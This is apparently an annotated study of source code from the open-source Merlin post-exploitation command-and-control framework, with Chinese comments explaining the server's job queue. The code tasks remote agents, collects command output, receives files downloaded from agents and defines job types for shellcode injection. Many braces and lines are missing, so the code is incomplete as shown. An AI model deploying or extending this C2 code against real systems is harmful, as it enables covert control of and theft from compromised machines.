   if agentID.String() == "ffffffff-ffff-ffff-ffff-ffffffffffff" { 如果agent设置为所有agent的广播标识符  
      if len(agents.Agents) <= 0 {  
         return "", fmt.Errorf("there are 0 available agents, no jobs were created")  
      for a := range agents.Agents {  
         // Fill out remaining job fields  
         token := uuid.NewV4() 生成token  
         job.ID = core.RandStringBytesMaskImprSrc(10) 生成10位随机字符id  
         job.Token = token  
         job.AgentID = a  
         // Add job to the channel  
         \_, k := JobsChannel\[agentID\]  
         if !k {  
            JobsChannel\[agentID\] = make(chan merlinJob.Job, 100)  为每个agent分配100个job空间  
         JobsChannel\[a\] <- job  
         //agents.Agents\[a\].JobChannel <- job  
         // Add job to the list  
         Jobs\[job.ID\] = info{ 填充job信息  
            AgentID: a,  
            Token:   token,  
            Type:    merlinJob.String(job.Type),  
            Status:  merlinJob.CREATED,  
            Created: time.Now().UTC(),  
            Command: jobType + " " + strings.Join(jobArgs, " "),  
         // Log the job  
         if ok {  
            agent.Log(fmt.Sprintf("Created job Type:%s, ID:%s, Status:%s, Args:%s",  
   } else {  
      // A single Agent  
      token := uuid.NewV4()  
      job.Token = token  
      job.ID = core.RandStringBytesMaskImprSrc(10)  
      job.AgentID = agentID  
      // Add job to the channel  
      \_, k := JobsChannel\[agentID\]  
      if !k {  
         JobsChannel\[agentID\] = make(chan merlinJob.Job, 100)  
      JobsChannel\[agentID\] <- job  
      // Add job to the list  
      Jobs\[job.ID\] = info{  
         AgentID: agentID,  
         Token:   token,  
         Type:    merlinJob.String(job.Type),  
         Status:  merlinJob.CREATED,  
         Created: time.Now().UTC(),  
         Command: jobType + " " + strings.Join(jobArgs, " "),  
      // Log the job  
      if ok {  
         agent.Log(fmt.Sprintf("Created job Type:%s, ID:%s, Status:%s, Args:%s",  
   return job.ID, nil  
// Clear removes any jobs the queue that have been created, but NOT sent to the agent  
func Clear(agentID uuid.UUID) error {  
   if core.Debug {  
      message("debug", "Entering into jobs.Clear() function...")  
   //\_, ok := agents.Agents\[agentID\]  
   //if !ok {  
   // return fmt.Errorf("%s is not a valid agent", agentID)  
   // Empty the job channel  
   jobChannel, k := JobsChannel\[agentID\]  
   if !k {  
      // There was not a jobs channel for this agent  
      return nil  
   jobLength := len(jobChannel)  
   if jobLength > 0 {  
      for i := 0; i < jobLength; i++ {  
         job := <-jobChannel 循环遍历取出job设置status为cancel  
         // Update Job Info structure  
         j, ok := Jobs\[job.ID\]  
         if ok {  
            j.Status = merlinJob.CANCELED  
            Jobs\[job.ID\] = j  
         } else {  
            return fmt.Errorf("invalid job %s for agent %s", job.ID, agentID)  
         if core.Debug {  
            message("debug", fmt.Sprintf("Channel command string: %+v", job))  
            message("debug", fmt.Sprintf("Job type: %s", messages.String(job.Type)))  
   return nil  
// ClearCreated removes all unsent jobs across all agents 删除所有agent                                                                                                          所有未发送的job  
func ClearCreated() error {  
   if core.Debug {  
      message("debug", "Entering into jobs.Clear() function...")  
   for id := range JobsChannel {  
      err := Clear(id)  
      if err != nil {  
         return err  
   return nil  
// Get returns a list of jobs that need to be sent to the agent返回需要发送给agent的job列表 根据agent uuid取出对应的job channel中的所有job设置type为sent  
func Get(agentID uuid.UUID) (\[\]merlinJob.Job, error) {  
   if core.Debug {  
      message("debug", "Entering into jobs.Get() function...")  
   var jobs \[\]merlinJob.Job  
   \_, ok := agents.Agents\[agentID\]  
   if !ok {  
      return jobs, fmt.Errorf("%s is not a valid agent", agentID)  
   jobChannel, k := JobsChannel\[agentID\]  
   if !k {  
      // There was not a jobs channel for this agent  
      return jobs, nil  
   // Check to see if there are any jobs  
   jobLength := len(jobChannel)  
   if jobLength > 0 {  
      for i := 0; i < jobLength; i++ {  
         job := <-jobChannel  
         jobs = append(jobs, job)  
         // Update Job Info map  
         j, ok := Jobs\[job.ID\]  
         if ok {  
            j.Status = merlinJob.SENT  
            j.Sent = time.Now().UTC()  
            Jobs\[job.ID\] = j  
         } else {  
            return jobs, fmt.Errorf("invalid job %s for agent %s", job.ID, agentID)  
         if core.Debug {  
            message("debug", fmt.Sprintf("Channel command string: %+v", job))  
            message("debug", fmt.Sprintf("Job type: %s", merlinJob.String(job.Type)))  
   if core.Debug {  
      message("debug", fmt.Sprintf("Returning jobs:\\r\\n%+v", jobs))  
   return jobs, nil  
// Handler evaluates a message sent in by the agent and the subsequently executes any corresponding tasks  
func Handler(m messages.Base) (messages.Base, error) {  
   if core.Debug {  
      message("debug", "Entering into jobs.Handle() function...")  
      message("debug", fmt.Sprintf("Input message: %+v", m))  
   returnMessage := messages.Base{  
      ID:      m.ID,  
      Version: 1.0,  
   if m.Type != messages.JOBS { message类型为jobs  
      return returnMessage, fmt.Errorf("invalid message type: %s for job handler", messages.String(m.Type))  
   jobs := m.Payload.(\[\]merlinJob.Job) 拆解message中payload字段为jobs  
   a, ok := agents.Agents\[m.ID\] 获取agent uuid  
   if !ok {  
      return returnMessage, fmt.Errorf("%s is not a valid agent", m.ID)  
   a.StatusCheckIn = time.Now().UTC()  
   returnMessage.Padding = core.RandStringBytesMaskImprSrc(a.PaddingMax)  
   var returnJobs \[\]merlinJob.Job  
   for \_, job := range jobs {  
      // Check to make sure agent UUID is in dataset  
      agent, ok := agents.Agents\[job.AgentID\]  
      if ok {  
         // Verify that the job contains the correct token and that it was not already completed  
         err := checkJob(job)  
         if err != nil {  
            // Agent will send back error messages that are not the result of a job  
            if job.Type != merlinJob.RESULT {  
               return returnMessage, err  
            if core.Debug {  
               message("debug", fmt.Sprintf("Received %s message without job token.\\r\\n%s", messages.String(job.Type), err))  
         switch job.Type {  
         case merlinJob.RESULT:  
            agent.Log(fmt.Sprintf("Results for job: %s", job.ID))  
            userMessage := messageAPI.UserMessage{  
               Level:   messageAPI.Note,  
               Time:    time.Now().UTC(),  
               Message: fmt.Sprintf("Results job %s for agent %s at %s", job.ID, job.AgentID, time.Now().UTC().Format(time.RFC3339)),  
            result := job.Payload.(merlinJob.Results)广播格式化job信息要输出  
            if len(result.Stdout) > 0 {  
               agent.Log(fmt.Sprintf("Command Results (stdout):\\r\\n%s", result.Stdout))  
               userMessage := messageAPI.UserMessage{  
                  Level:   messageAPI.Success,  
                  Time:    time.Now().UTC(),  
                  Message: result.Stdout,  
               messageAPI.SendBroadcastMessage(userMessage)广播job command结果  
            if len(result.Stderr) > 0 {  
               agent.Log(fmt.Sprintf("Command Results (stderr):\\r\\n%s", result.Stderr))   
               userMessage := messageAPI.UserMessage{  
                  Level:   messageAPI.Warn,  
                  Time:    time.Now().UTC(),  
                  Message: result.Stderr,  
               messageAPI.SendBroadcastMessage(userMessage) 广播命令错误信息  
         case merlinJob.AGENTINFO:  
         case merlinJob.FILETRANSFER: 传输文件  
            err := fileTransfer(job.AgentID, job.Payload.(merlinJob.FileTransfer))  
            if err != nil {  
               return returnMessage, err  
         // Update Jobs Info structure  
         j, k := Jobs\[job.ID\]  
         if k {  
            j.Status = merlinJob.COMPLETE  
            j.Completed = time.Now().UTC()  
            Jobs\[job.ID\] = j  
      } else {  
         userMessage := messageAPI.UserMessage{  
            Level:   messageAPI.Warn,  
            Time:    time.Now().UTC(),  
            Message: fmt.Sprintf("Job %s was for an invalid agent %s", job.ID, job.AgentID),  
   // See if there are any new jobs to send back 完成job后查看是否有新job要执行  
   agentJobs, err := Get(m.ID)  
   if err != nil {  
      return returnMessage, err  
   returnJobs = append(returnJobs, agentJobs...)  
   if len(returnJobs) > 0 {  
      returnMessage.Type = messages.JOBS  
      returnMessage.Payload = returnJobs  
   } else {  
      returnMessage.Type = messages.IDLE  
   if core.Debug {  
      message("debug", fmt.Sprintf("Message that will be returned to the Agent:\\r\\n%+v", returnMessage))  
      message("debug", "Leaving jobs.Handle() function...")  
   return returnMessage, nil  
// Idle handles input idle messages from the agent and checks to see if there are any jobs to return  
输入agent的 idle信息并查看是否有job去返回(返回对应uuid的job)   
func Idle(agentID uuid.UUID) (messages.Base, error) {  
   returnMessage := messages.Base{  
      ID:      agentID,  
      Version: 1.0,  
   agent, ok := agents.Agents\[agentID\]  
   if !ok {  
      return returnMessage, fmt.Errorf("%s is not a valid agent", agentID)  
   if core.Verbose || core.Debug {  
      message("success", fmt.Sprintf("Received agent status checkin from %s", agentID))  
   agent.StatusCheckIn = time.Now().UTC()  
   returnMessage.Padding = core.RandStringBytesMaskImprSrc(agent.PaddingMax)  
   // See if there are any new jobs to send back  
   jobs, err := Get(agentID)  
   if err != nil {  
      return returnMessage, err  
   if len(jobs) > 0 {  
      returnMessage.Type = messages.JOBS  
      returnMessage.Payload = jobs  
   } else {  
      returnMessage.Type = messages.IDLE  
   return returnMessage, nil  
// GetTableActive returns a list of rows that contain information about active jobs  
func GetTableActive(agentID uuid.UUID) (\[\]\[\]string, error) {  
   if core.Debug {  
      message("debug", fmt.Sprintf("entering into jobs.GetTableActive for agent %s", agentID.String()))  
   var jobs \[\]\[\]string  
   \_, ok := agents.Agents\[agentID\]  
   if !ok {  
      return jobs, fmt.Errorf("%s is not a valid agent", agentID)  
   for id, job := range Jobs {  
      if job.AgentID == agentID {  
         //message("debug", fmt.Sprintf("GetTableActive(%s) ID: %s, Job: %+v", agentID.String(), id, job))  
         var status string  
         switch job.Status {  
         case merlinJob.CREATED:  
            status = "Created"  
         case merlinJob.SENT:  
            status = "Sent"  
         case merlinJob.RETURNED:  
            status = "Returned"  
            status = fmt.Sprintf("Unknown job status: %d", job.Status)  
         var zeroTime time.Time  
         // Don't add completed or canceled jobs  
         if job.Status != merlinJob.COMPLETE && job.Status != merlinJob.CANCELED {  
            var sent string  
            if job.Sent != zeroTime {  
               sent = job.Sent.Format(time.RFC3339)  
            // <JobID>, <Command>, <JobStatus>, <Created>, <Sent>  
            jobs = append(jobs, \[\]string{  
   return jobs, nil  
// GetTableAll returns all unsent jobs to be displayed as a table 展示所有未发送的job  
func GetTableAll() \[\]\[\]string {  
   var jobs \[\]\[\]string  
   for id, job := range Jobs {  
      var status string  
      switch job.Status {  
      case merlinJob.CREATED:  
         status = "Created"  
      case merlinJob.SENT:  
         status = "Sent"  
      case merlinJob.RETURNED:  
         status = "Returned"  
         status = fmt.Sprintf("Unknown job status: %d", job.Status)  
      if job.Status != merlinJob.COMPLETE && job.Status != merlinJob.CANCELED {  
         var zeroTime time.Time  
         var sent string  
         if job.Sent != zeroTime {  
            sent = job.Sent.Format(time.RFC3339)  
         jobs = append(jobs, \[\]string{  
   return jobs  
// checkJob verifies that the input job message contains the expected token and was not already completed  
func checkJob(job merlinJob.Job) error {  
   // Check to make sure agent UUID is in dataset  
   \_, ok := agents.Agents\[job.AgentID\]  
   if !ok {  
      return fmt.Errorf("job %s was for an invalid agent %s", job.ID, job.AgentID)  
   j, k := Jobs\[job.ID\]  
   if !k {  
      return fmt.Errorf("job %s was not found for agent %s", job.ID, job.AgentID)  
   if job.Token != j.Token { 验证token  
      return fmt.Errorf("job %s for agent %s did not contain the correct token.\\r\\nExpected: %s, Got: %s", job.ID, job.AgentID, j.Token, job.Token)  
   if j.Status == merlinJob.COMPLETE { 验证job是否完成  
      return fmt.Errorf("job %s for agent %s was previously completed on %s", job.ID, job.AgentID, j.Completed.UTC().Format(time.RFC3339))  
   if j.Status == merlinJob.CANCELED { 验证job是否取消  
      return fmt.Errorf("job %s for agent %s was previously canceled on", job.ID, job.AgentID)  
   return nil  
// fileTransfer handles file upload/download operations  
func fileTransfer(agentID uuid.UUID, p merlinJob.FileTransfer) error {  
   if core.Debug {  
      message("debug", "Entering into agents.FileTransfer")  
   // Check to make sure it is a known agent  
   agent, ok := agents.Agents\[agentID\]  
   if !ok {  
      return fmt.Errorf("%s is not a valid agent", agentID)  
   if p.IsDownload {  
      agentsDir := filepath.Join(core.CurrentDir, "data", "agents")  
      \_, f := filepath.Split(p.FileLocation) // We don't need the directory part for anything  
      if \_, errD := os.Stat(agentsDir); os.IsNotExist(errD) {  
         errorMessage := fmt.Errorf("there was an error locating the agent's directory:\\r\\n%s", errD.Error())  
         return errorMessage  
      message("success", fmt.Sprintf("Results for %s at %s", agentID, time.Now().UTC().Format(time.RFC3339)))  
      downloadBlob, downloadBlobErr := base64.StdEncoding.DecodeString(p.FileBlob) base64解码下载的内容  
      if downloadBlobErr != nil {  
         errorMessage := fmt.Errorf("there was an error decoding the fileBlob:\\r\\n%s", downloadBlobErr.Error())  
         return errorMessage  
      downloadFile := filepath.Join(agentsDir, agentID.String(), f)在agent id 对应的文件夹下存储下载的文件  
      writingErr := ioutil.WriteFile(downloadFile, downloadBlob, 0600)  
      if writingErr != nil {  
         errorMessage := fmt.Errorf("there was an error writing to -> %s:\\r\\n%s", p.FileLocation, writingErr.Error())  
         return errorMessage  
      successMessage := fmt.Sprintf("Successfully downloaded file %s with a size of %d bytes from agent %s to %s",  
      message("success", successMessage)  
   if core.Debug {  
      message("debug", "Leaving agents.FileTransfer")  
   return nil  
// message is used to send send messages to STDOUT where the server is running and not intended to be sent to CLI  
用于将发送消息发送到服务器正在运行的 STDOUT,而不打算发送到 CLI  
func message(level string, message string) {  
   switch level {  
   case "info":  
      color.Cyan("\[i\]" + message)  
   case "note":  
      color.Yellow("\[-\]" + message)  
   case "warn":  
      color.Red("\[!\]" + message)  
   case "debug":  
      color.Red("\[DEBUG\]" + message)  
   case "success":  
      color.Green("\[+\]" + message)  
      color.Red("\[\_-\_\]Invalid message level: " + message)  


// Merlin is a post-exploitation command and control framework.  
// This file is part of Merlin.  
// Copyright (C) 2021  Russel Van Tuyl  
// Merlin is free software: you can redistribute it and/or modify  
// it under the terms of the GNU General Public License as published by  
// the Free Software Foundation, either version 3 of the License, or  
// any later version.  
// Merlin is distributed in the hope that it will be useful,  
// but WITHOUT ANY WARRANTY; without even the implied warranty of  
// GNU General Public License for more details.  
// You should have received a copy of the GNU General Public License  
// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.  
package jobs  
// TODO Does it makes sense to move this under pkg/agents/jobs?  
import (  
   // Standard  
   // 3rd Party  
   uuid "github.com/satori/go.uuid"  
// init registers message types with gob that are an interface for Base.Payload  
func init() {  
const (  
   // CREATED is used to denote that job has been created  
   CREATED \= 1  
   // SENT is used to denote that the job has been sent to the Agent  
   SENT \= 2  
   // RETURNED is for when a chunk has been returned but the job hasn't finished running  
   RETURNED \= 3  
   // COMPLETE is used to denote that the job has finished running and the Agent has sent back the results  
   COMPLETE \= 4  
   // CANCELED is used to denoted jobs that were cancelled with the "clear" command  
   CANCELED \= 5  
   // To Agent  
   // CMD is used to send CmdPayload messages  
   CMD \= 10 // CmdPayload  
   // CONTROL is used to send AgentControl messages  
   CONTROL \= 11 // AgentControl  
   // SHELLCODE is used to send shellcode messages  
   SHELLCODE \= 12 // Shellcode  
   // NATIVE is used to send NativeCmd messages  
   NATIVE \= 13 // NativeCmd  
   // FILETRANSFER is used to send FileTransfer messages for upload/download operations  
   FILETRANSFER \= 14 // FileTransfer  
   // OK is used to signify that there is nothing to do, or to idle  
   OK \= 15 // ServerOK  
   // MODULE is used to send Module messages  
   MODULE \= 16 // Module  
   // From Agent  
   // RESULT is used by the Agent to return a result message  
   RESULT \= 20  
   // AGENTINFO is used by the Agent to return information about its configuration  
   AGENTINFO \= 21  
// Job is used to task an agent to run a command  
type Job struct {  
   AgentID uuid.UUID   // ID of the agent the job belong to  
   ID      string      // Unique identifier for each job  
   Token   uuid.UUID   // A unique token for each task that acts like a CSRF token to prevent multiple job messages  
   Type    int         // The type of job it is (e.g., FileTransfer  
   Payload interface{} // Embedded messages of various types  
// Command is the structure to send a task for the agent to execute  
type Command struct {  
   Command string   \`json:"command"\`  
   Args    \[\]string \`json:"args"\`  
// Shellcode is a JSON payload containing shellcode and the method for execution  
type Shellcode struct {  
   Method string \`json:"method"\`  
   Bytes  string \`json:"bytes"\`         // Base64 string of shellcode bytes  
   PID    uint32 \`json:"pid,omitempty"\` // Process ID for remote injection  
// FileTransfer is the JSON payload to transfer files between the server and agent  
type FileTransfer struct {  
   FileLocation string \`json:"dest"\`  
   FileBlob     string \`json:"blob"\`  
   IsDownload   bool   \`json:"download"\`  
// Results is a JSON payload that contains the results of an executed command from an agent  
type Results struct {  
   Stdout string \`json:"stdout"\`  
   Stderr string \`json:"stderr"\`  
// String returns the text representation of a message constant  
func String(jobType int) string {  
   switch jobType {  
   case CMD:  
      return "Command"  
   case CONTROL:  
      return "AgentControl"  
   case SHELLCODE:  
      return "Shellcode"  
   case NATIVE:  
      return "Native"  
      return "FileTransfer"  
   case OK:  
      return "ServerOK"  
   case MODULE:  
      return "Module"  
   case RESULT:  
      return "Result"  
   case AGENTINFO:  
      return "AgentInfo"  
      return fmt.Sprintf("Invalid job type: %d", jobType)  

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